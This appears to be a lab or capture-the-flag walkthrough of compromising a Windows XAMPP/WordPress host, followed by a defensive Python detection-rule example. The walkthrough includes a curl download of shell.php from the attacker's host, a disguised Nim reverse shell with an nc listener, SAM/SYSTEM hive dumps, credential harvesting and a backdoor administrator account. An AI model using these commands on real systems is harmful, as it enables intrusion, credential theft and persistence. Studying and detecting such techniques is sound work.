git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/
subl exploit.bat
exploit.bat
@echo off
:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul
if %errorlevel% equ 0 (
    :: Run commands for NT AUTHORITY\SYSTEM
    reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
    reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
    :: Run commands for other users
    curl http://$KALI:82/shell.php -o C:\xampp\htdocs\shell.php
)
I tried bypassing the file type restriction with the batch file above. I could tell the bat file was running because it tried to grab shell.php, but I couldn't find a place to save the file that was also reachable from the website.
Kali
python2 -m SimpleHTTPServer 82
The Nim reverse shell worked because the site accepts exe files.
Kali
git clone https://github.com/Sn1r/Nim-Reverse-Shell.git
cd Nim-Reverse-Shell/
apt install mingw-w64 -y
Kali
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
Kali
subl rev_shell.nim
Kali #1
/root/.nimble/bin/nim c -d:mingw --app:gui --opt:speed -o:Calculator.exe rev_shell.nim
Kali #2
rlwrap nc -lvnp 443
Privilege Escalation
Found some credentials.
Victim
type C:\xampp\htdocs\gift\wp-config.php
From my machine I could access MySQL directly.
Kali
apt install mysql-client-core-5.7
mysql -h$VICTIM -ugift -pSurpriseMF
I was able to find a password in the database but couldn't crack it.
Kali(mysql)
use gift;
show tables;
select * from wp_users;
I found a password
Victim
reg query HKLM /f password /t REG_SZ /s
Kali
remmina
Username: hugo
Password: SurpriseMF123!
I can run an administrator shell from the GUI.
Victim
net user backdoor pass!123 /add
net localgroup Administrators "Remote Desktop Users" backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
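From the defender's side, every post-exploitation step in this writeup (dumping the SAM and SYSTEM hives with reg save, hunting the registry for "password", adding a local user, putting it in Administrators, and changing the Lsa forceguest value) shows up as a process command line. The following is an added example, not part of the original writeup, showing how those command lines can be matched with a small rule set. The sample events are constructed, not real telemetry, and the field names image and command_line are assumptions standing in for whatever your process-creation source (Sysmon, EDR, Security log 4688) provides.

```python
import re

# Constructed sample process-creation records (not real telemetry). The
# field names are assumptions: adapt them to your collector's schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak"},
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak"},
    {"image": r"C:\Windows\System32\net.exe",
     "command_line": r"net user backdoor pass!123 /add"},
    {"image": r"C:\Windows\System32\net.exe",
     "command_line": r"net localgroup Administrators backdoor /add"},
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f"},
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg query HKLM /f password /t REG_SZ /s"},
    # Benign noise that the rules should ignore.
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
    {"image": r"C:\Windows\System32\net.exe",
     "command_line": r"net use Z: \\fileserver\share"},
]

# Each rule is (name, compiled regex). Matching is case-insensitive because
# cmd.exe is, and "net1" is accepted since it is a common substitute for "net".
RULES = [
    ("hive_dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM|SECURITY)\b", re.I)),
    ("local_user_added",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("admin_group_change",
     re.compile(r'\bnet(?:1)?(?:\.exe)?\s+localgroup\s+"?administrators"?\s+\S+\s+/add\b', re.I)),
    ("lsa_forceguest_change",
     re.compile(r"\breg(?:\.exe)?\s+add\s+HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\b.*\bforceguest\b", re.I)),
    ("registry_password_hunt",
     re.compile(r"\breg(?:\.exe)?\s+query\s+HKLM\b.*\s/f\s+password\b", re.I)),
]


def match_rules(command_line):
    """Return the names of all rules whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def triage(events):
    """Return (image, command_line, [rule names]) for every event that hits a rule."""
    hits = []
    for ev in events:
        names = match_rules(ev["command_line"])
        if names:
            hits.append((ev["image"], ev["command_line"], names))
    return hits


if __name__ == "__main__":
    for image, cmd, names in triage(SAMPLE_EVENTS):
        print(f"{', '.join(names):24s} {image}  ::  {cmd}")
```

Two of the eight constructed events are benign and produce no hit; the other six each trigger exactly one rule. In practice the hive_dump and lsa_forceguest_change rules are rare enough in normal administration to alert on directly, while local_user_added and admin_group_change are better correlated with the parent process (a web server's child process running net.exe, as in this writeup, is the interesting case).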